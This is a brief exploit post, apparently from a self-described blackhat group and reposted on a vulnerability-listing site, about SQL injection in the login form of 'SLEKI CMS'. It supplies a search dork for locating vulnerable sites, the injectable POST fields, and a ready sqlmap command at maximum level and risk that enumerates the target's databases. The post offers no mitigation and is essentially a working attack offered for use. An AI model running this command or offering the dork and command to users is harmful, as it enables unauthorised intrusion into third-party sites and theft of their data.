SLEKI CMS BUGS SQL INJECTION POST DATA

2018.03.07
id PuQ (ID) id
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: intext:"SLEKI CMS"

============================================================== | # Title : SLEKI CMS BUGS SQL INJECTION POST DATA | # Author : PuQ | # Publish : ternateblackhat.org | # Dork : intext:"SLEKI CMS" | # Email : ternateblackhat@gmail.com | # Pages : fb.com/ternateblackhat ============================================================== #POC Bugs this login form input password, like this test using SQLmap post data. #TARGET https://bugs.io/?open=login #POST-DATA username=ternate&password=input_string_here&input_string_here=Login #SQLmap PuQ>sqlmap.py -u https://bugs.io/?open=login --data="username=input_string_here&password=input_string_here&login=Login" --level=5 --risk=3 --dbs https://3.bp.blogspot.com/-TErld1Dw3e8/WhQhmMnIK1I/AAAAAAAAACE/7dBM4O9kr_oZvX9xCgM6KScL2Trh8M2hQCLcBGAs/s1600/sleki-2.PNG K33P-S1L3NT

References:

http://www.ternateblackhat.org
http://www.3njhuteam.github.io
http://www.facebook.com/loading.gov
http://www.facebook.com/ternateblackhat


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top